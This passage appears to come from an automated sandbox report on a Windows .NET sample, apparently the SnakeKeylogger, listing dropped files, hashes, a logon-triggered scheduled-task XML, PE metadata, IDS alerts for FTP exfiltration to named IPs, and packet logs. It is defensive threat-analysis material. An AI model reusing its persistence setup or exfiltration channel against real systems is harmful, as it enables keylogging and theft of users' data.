SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.380747059108785
Encrypted:	false
SSDEEP:	48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:lGLHxvIIwLgZ2KRHWLOug8s
MD5:	4D3B8C97355CF67072ABECB12613F72B
SHA1:	07B27BA4FE575BBF9F893F03789AD9B8BC2F8615
SHA-256:	75FC38CDE708951C1963BB89E8AA6CC82F15F1A261BEACAF1BFD9CF0518BEECD
SHA-512:	8E47C93144772042865B784300F4528E079615F502A3C5DC6BFDE069880268706B7B3BEE227AD5D9EA0E6A3055EDBC90B39B9E55FE3AD58635493253A210C996
Malicious:	false
Preview:	@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vivh03m.opm.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5eplu0ek.y5z.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xq1hcwo.jfg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fc0l51dn.cgk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5zuv2kr.nr0.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msafu4l2.3vy.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_quolovpg.tqh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmhpdgx0.xeu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp470C.tmp

Download File

Process:	C:\Users\user\Desktop\hesaphareketi-01.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.102225587263902
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLeKaxv:cge7QYrFdOFzOzN33ODOiDdKrsuTKBv
MD5:	C76EC0557AEFDA13998ED88B9BD9FB7F
SHA1:	47712ACE7C6EB7954D6AA98E55714D926E19AB53
SHA-256:	FF80B9CB417C74EDC55F87906CFF520CC6ABCFFEB80158100F8D171A7D4F3C08
SHA-512:	34F8681380817C17859B28E67F159B0E927C947DE99104AB9B39E8909ED92771A66441F6EFF0A1CDA6186588AA67FD176396D9D82DBAE81D2E9E103B629206EB
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Local\Temp\tmp5A94.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1596
Entropy (8bit):	5.102225587263902
Encrypted:	false
SSDEEP:	24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLeKaxv:cge7QYrFdOFzOzN33ODOiDdKrsuTKBv
MD5:	C76EC0557AEFDA13998ED88B9BD9FB7F
SHA1:	47712ACE7C6EB7954D6AA98E55714D926E19AB53
SHA-256:	FF80B9CB417C74EDC55F87906CFF520CC6ABCFFEB80158100F8D171A7D4F3C08
SHA-512:	34F8681380817C17859B28E67F159B0E927C947DE99104AB9B39E8909ED92771A66441F6EFF0A1CDA6186588AA67FD176396D9D82DBAE81D2E9E103B629206EB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

C:\Users\user\AppData\Roaming\WvaGpcFVX.exe

Download File

Process:	C:\Users\user\Desktop\hesaphareketi-01.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	797696
Entropy (8bit):	7.451821708269546
Encrypted:	false
SSDEEP:	12288:GTfOxmCKE2pb57IF0kVtn1IyyMgGpT1dl2veI0ay3MxyNALB:GS2t5sF0Gn1TcGB/l2veb8B
MD5:	FB1DDD3D10CA671F437C6F2F3C9D6E57
SHA1:	7BD24B6B4A1E30C7BD2EC0CFBE886021A902C912
SHA-256:	49917F413CBF883715A5F6E5A30CB13ABAFC693EC296751BA8B1BDBC3142E8C5
SHA-512:	5EDFB4CCDE93569C171B48EEAC48026BB42D4CDBD791A5833945C5E4D775ABDFB2529B04AAC798FCABC5B1EF91B9EACBB6EA13452B27DB98DBB55569EB337496
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?+g..............0............../... ...@....@.. ....................................@.....................................O....@..T....................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc...T....@......................@..@.reloc.......`.....................@..B................./......H...........pR......8...................................................0.................,.r...ps5...z.o6... . &........,.r...ps7...z....o8....o9...s:.... . &.o;......o<...(=.......+O....+....}X......[...X.....X.....o>.........-...o?....o>....ZY...[...ZX.....X.....o@.........-....oA.......0............{.....+...0............{.....+..^.(B.......}......}.....0............{,....+...0.............(....o.....+.....0............{.....+..*.0..^.........}..... .........}.....

C:\Users\user\AppData\Roaming\WvaGpcFVX.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\hesaphareketi-01.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.451821708269546
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	hesaphareketi-01.exe
File size:	797'696 bytes
MD5:	fb1ddd3d10ca671f437c6f2f3c9d6e57
SHA1:	7bd24b6b4a1e30c7bd2ec0cfbe886021a902c912
SHA256:	49917f413cbf883715a5f6e5a30cb13abafc693ec296751ba8b1bdbc3142e8c5
SHA512:	5edfb4ccde93569c171b48eeac48026bb42d4cdbd791a5833945c5e4d775abdfb2529b04aac798fcabc5b1ef91b9eacbb6ea13452b27db98dbb55569eb337496
SSDEEP:	12288:GTfOxmCKE2pb57IF0kVtn1IyyMgGpT1dl2veI0ay3MxyNALB:GS2t5sF0Gn1TcGB/l2veb8B
TLSH:	2B059CD03661AB19DEAD87B8C149DC7483B41E657005FAAE5ED837D738B9320AE08F47
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?+g..............0............../... ...@....@.. ....................................@................................

File Icon


Icon Hash:	26b6dac84c6c3e03

Static PE Info

General

Entrypoint:	0x4c2f2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x672B3FF7 [Wed Nov 6 10:07:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
adc al, 00h
add byte ptr [eax], al
adc dword ptr [eax], eax
add byte ptr [eax], al
adc dword ptr [eax], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
sldt word ptr [eax]
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [eax+eax], cl
add byte ptr [eax], al
or al, 00h
add byte ptr [eax], al
or al, 00h
add byte ptr [eax], al
or al, byte ptr [eax]
add byte ptr [eax], al
or eax, 0C000000h
add byte ptr [eax], al
add byte ptr [ebx], cl
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc2edc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x1654	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xc0f74	0xc1000	7777e372626a505990aefe8c5a03f9f6	False	0.7659867835168394	data	7.469835605712907	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc4000	0x1654	0x1800	416be5b450448782c5988d8c7769b09d	False	0.4451497395833333	data	4.61335121878706	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc6000	0xc	0x200	1e0ba8b4d46bbf5dd501b0f4a2668c49	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc4118	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.4939236111111111
RT_GROUP_ICON	0xc5318	0x14	data	1.0
RT_GROUP_ICON	0xc532c	0x14	data	1.05
RT_VERSION	0xc5340	0x314	data	0.4149746192893401

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-06T17:02:32.729019+0100	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.6	50094	50.31.176.103	21	TCP
2024-11-06T17:02:32.729019+0100	2845532	ETPRO MALWARE SnakeKeylogger Exfil via FTP M1	1	192.168.2.6	50114	50.31.176.103	21	TCP
2024-11-06T17:02:44.333550+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56815	193.122.6.168	80	TCP
2024-11-06T17:02:45.536539+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56815	193.122.6.168	80	TCP
2024-11-06T17:02:46.299399+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56834	188.114.96.3	443	TCP
2024-11-06T17:02:47.224068+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56841	193.122.6.168	80	TCP
2024-11-06T17:02:48.224050+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56843	193.122.6.168	80	TCP
2024-11-06T17:02:48.817798+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56856	193.122.6.168	80	TCP
2024-11-06T17:02:49.559832+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56858	188.114.96.3	443	TCP
2024-11-06T17:02:50.288092+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56843	193.122.6.168	80	TCP
2024-11-06T17:02:51.072384+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56868	188.114.96.3	443	TCP
2024-11-06T17:02:52.005298+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56874	193.122.6.168	80	TCP
2024-11-06T17:02:52.819631+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56880	188.114.96.3	443	TCP
2024-11-06T17:02:53.997145+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56885	193.122.6.168	80	TCP
2024-11-06T17:02:54.797377+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56891	188.114.96.3	443	TCP
2024-11-06T17:02:55.724025+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.6	56897	193.122.6.168	80	TCP
2024-11-06T17:02:58.359771+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56914	188.114.96.3	443	TCP
2024-11-06T17:03:01.692771+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	56931	188.114.96.3	443	TCP
2024-11-06T17:03:05.137972+0100	2845535	ETPRO MALWARE SnakeKeylogger Exfil via FTP M4	1	192.168.2.6	50102	50.31.176.103	34028	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 6, 2024 17:02:36.192918062 CET	49674	443	192.168.2.6	173.222.162.64
Nov 6, 2024 17:02:36.193600893 CET	49673	443	192.168.2.6	173.222.162.64
Nov 6, 2024 17:02:36.521039963 CET	49672	443	192.168.2.6	173.222.162.64
Nov 6, 2024 17:02:38.558278084 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:38.558332920 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:38.558402061 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:38.558738947 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:38.558754921 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.571259975 CET	443	56796	173.222.162.64	192.168.2.6
Nov 6, 2024 17:02:39.571373940 CET	56796	443	192.168.2.6	173.222.162.64
Nov 6, 2024 17:02:39.699647903 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.699763060 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.702163935 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.702174902 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.702399969 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.711869001 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.759325981 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.940675974 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.940705061 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.940730095 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.940769911 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.940788984 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.940814972 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.940838099 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.955169916 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.955207109 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.955288887 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:39.955300093 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:39.955360889 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.058487892 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.058521032 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.058578014 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.058594942 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.058636904 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.058655977 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.072338104 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.072355032 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.072415113 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.072427988 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.072465897 CET	56801	443	192.168.2.6	13.107.246.45
Nov 6, 2024 17:02:40.074806929 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.074824095 CET	443	56801	13.107.246.45	192.168.2.6
Nov 6, 2024 17:02:40.074882984 CET	56801	443	192.168.2.6	13.107.246.45
